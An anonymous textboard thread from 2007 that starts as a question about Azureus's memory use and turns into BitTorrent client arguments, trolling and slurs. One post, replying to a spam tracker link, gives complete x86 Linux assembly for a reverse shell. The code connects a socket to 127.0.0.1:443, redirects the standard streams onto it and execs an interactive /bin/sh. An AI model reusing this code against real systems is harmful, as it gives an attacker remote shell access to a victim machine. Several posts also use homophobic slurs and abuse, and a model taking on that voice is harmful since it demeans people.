Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

anyone know java? (azureusC)

Name: Anonymous 2007-06-01 4:56 ID:PQjQcHG5

have you read azureus's code? what is taking up 175MB of ram? i have ~70 torrents running. my cache is only 16MB. is the rest just messages/connection info for each peer? there is probably the hash of every piece loaded in ram too. but how much does that take up?

Name: Anonymous 2007-06-01 5:12 ID:JTULEi8b

It's my understanding that P2P apps take up assloads of memory because of the way they're designed... the principle is to reduce the amount of data that's running back and forth across the network about different servers and what files they have. It puts more strain on the short-term clients, but it's theoretically better for anonymity.

Name: Anonymous 2007-06-01 5:24 ID:jWKTKh/P

>>1
java troll is java

Name: Anonymous 2007-06-01 5:57 ID:HQ0NeoVy

Good Torrent Tracker List - http://ptorrentlist.dyndns.org

Name: Anonymous 2007-06-01 8:49 ID:Heaven

>>4
You've gotta be a real dumbfuck to think any *programmers* are going to fall for that.

Oh wait, I'm on 4chan? My mistake, there's no actual programmers here, just script kiddies and trolls.

Name: Anonymous 2007-06-01 9:09 ID:DQJ7UJdF

>>5
You've gotta be a real dumbfuck to think *anyone* here is not an expert programmer.

Oh wait, you're a troll? My mistake, i forgot this place is full of trolls.

Name: Anonymous 2007-06-01 10:37 ID:YrAEpzzZ

ANGRY PEOPLE ITT

Name: Anonymous 2007-06-01 10:53 ID:4KxCWS2G

>>4
I just finished my Linux implementation, the binary is huge at 504 bytes though (I haven't done any fun space-saving stuff yet though) :'(  Here's the code (note, I don't really know assembly, so please bear with any stupid mistakes such as messing with the stack and doing stuff after execing):
#define AF_INET        2
#define PF_INET        AF_INET
#define IPPROTO_TCP    6
#define SOCK_STREAM    1
#define SYS_SOCKET     1
#define SYS_CONNECT    3
#define SYS_close      6
#define SYS_execve     11
#define SYS_dup        41
#define SYS_socketcall 102
.data
shell: .asciz "/bin/sh"
args:
        .int arg1
        .int arg2
env:
        .int 0
arg1: .asciz "sh"
arg2: .asciz "-i"
connection:
        .word PF_INET
        .word 0xBB01     /* 443 */
        .long 0x0100007F /* 127.0.0.1 */
        .long 0
        .long 0
.text
.globl _start
_start:
        pushl %ebp
        movl %esp, %ebp
        sub $12, %esp

        movl $SYS_socketcall, %eax
        movl $SYS_SOCKET, %ebx
        movl %esp, %ecx
        movl $AF_INET, (%esp)
        movl $SOCK_STREAM, 4(%esp)
        movl $IPPROTO_TCP, 8(%esp)
        int $0x80
        movl %eax, %edx

        cmp $0xFFFFFFFF, %eax
        je .exit

        movl %eax, (%esp)
        movl $connection, 4(%esp)
        movl $16, 8(%esp)
        movl $SYS_socketcall, %eax
        movl $SYS_CONNECT, %ebx
        movl %esp, %ecx
        int $0x80

        cmp $0, %eax
        jne .exit

        xor %ecx, %ecx
.openloop:
        movl $SYS_close, %eax
        movl %ecx, %ebx
        int $0x80

        movl $SYS_dup, %eax
        movl %edx, %ebx
        int $0x80

        cmp %ecx, %eax
        jne .exit

        add $1, %ecx
        cmp $3, %ecx
        jne .openloop

        movl $SYS_execve, %eax
        movl $shell, %ebx
        movl $args, %ecx
        movl $env, %edx
        int $0x80
.exit:
        movl $1, %eax
        movl $0, %ebx
        int $0x80

        movl %ebp, %esp
        popl %ebp
        ret

Name: Anonymous 2007-06-01 17:05 ID:3DURRMW8

>>1
Lol 70 torrents... What the fuck, mate. Make it 7, the ones you need anyways.

Name: Anonymous 2007-06-01 18:53 ID:PQjQcHG5

I AINT UR MATE, FAGGOT. IM NOT DLING 70, JUST SEEDING THEM. AND 90% ARE FROM OINK, BITMETV, ... SO THEY ARENT ACTIVE THAT OFTEN.

Name: Anonymous 2007-06-01 18:55 ID:Ex2Ce6zf

>>10
I can't believe you. The uneducated fucktards that tend to complain about software memory usage typically can't resist the word `mate'.

Name: Anonymous 2007-06-01 22:11 ID:PQjQcHG5

I AM NOT BITCHING ABOUT THE MEMORY USAGE, I HAVE LOTS OF RAMS. I AM JUST CURIOUS WHAT IT IS ALL BEING USED FOR.

Name: Anonymous 2007-06-01 23:07 ID:P0Nur7M+

>>12
Java, lol.

Name: Anonymous 2007-06-02 2:38 ID:ugqgolbV

lol, capslock

Name: Alac 2007-06-02 2:49 ID:W6RTDQBF

I KNOW GOOD JAVA BITCH! BETTER THEN YOU!

alacaq@gmail.com

Name: Anonymous 2007-06-02 5:30 ID:1xnE0sSS

Name: Anonymous 2007-06-02 13:24 ID:NvKiQA++

Azureus is just a big piece of shit.
Go get an older release of µTorrent.
It's like 200 kb, and only uses about 2 megs of ram, and you don't need to install it.

Name: Anonymous 2007-06-02 13:52 ID:11D1JQ4y

uTorrent = closed source = fail

Name: Anonymous 2007-06-02 14:08 ID:5t+Wjvnx

rtorrent you fags

Name: Anonymous 2007-06-02 14:55 ID:uCtuGkZa

azureus is the only one that can run headless on a server

all other fail for lack of features

Name: Anonymous 2007-06-02 15:08 ID:5t+Wjvnx

>>20
azureus is the only one that can run headless on a server

wtf

Name: Anonymous 2007-06-02 15:36 ID:8bNZI+v1

BitTorrent wins

Name: Anonymous 2007-06-03 0:05 ID:Heaven

Name: Anonymous 2007-06-03 0:40 ID:amBCvvm7

>>20
Um, even the original Python Bittorrent client could run headless.

Name: Anonymous 2009-01-14 14:55

What?

Name: Anonymous 2009-03-06 10:20


DIGITS are in the   same manner that   it cures some.

Name: Anonymous 2010-12-22 3:17

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List